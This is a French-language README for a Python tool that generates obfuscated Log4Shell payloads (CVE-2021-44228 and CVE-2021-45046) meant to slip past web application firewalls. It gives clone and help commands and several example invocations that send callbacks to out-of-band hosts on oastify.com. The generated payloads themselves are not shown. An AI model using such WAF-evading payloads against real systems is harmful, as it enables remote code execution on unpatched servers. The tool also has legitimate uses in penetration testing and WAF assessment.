
Générer des payloads obfusqués primaires ou secondaires pour CVE-2021-44228 ou CVE-2021-45046 afin d'éviter la détection du WAF.
Log4Shell-obfuscated-payloads-generator peut générer des charges utiles primaires obfusquées ou secondaires obfusquées pour CVE-2021-44228 ou CVE-2021-45046 afin d'éviter la détection par les WAF.
L'idée de conception de Log4Shell-obfuscated-payloads-generator
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
Log4Shell-obfuscated-payloads-generator fonctionne immédiatement avec Python version 3.x sur n'importe quelle plateforme.
Pour obtenir la liste des options de base, utilisez :
python3 Log4Shell-obfuscated-payloads-generator.py -h
Pour obtenir des exemples d'utilisation, utilisez :
python3 Log4Shell-obfuscated-payloads-generator.py -hh
-h : obtenir la liste des options de base

-hh : obtenir des exemples d'utilisation

Avec une seule option pour générer des charges utiles, l'option -s spécifie le serveur malveillant :
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com

--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com

--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com

--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com

Avec plusieurs options pour générer des charges utiles, l'option -s spécifie un serveur malveillant :
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com

Sans spécifier de serveur malveillant avec l'option -s, le placeholder {{callback_host}} sera conservé dans les charges utiles générées :
--generate-primary-obfuscated-cve-2021-44228-payload 3

--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
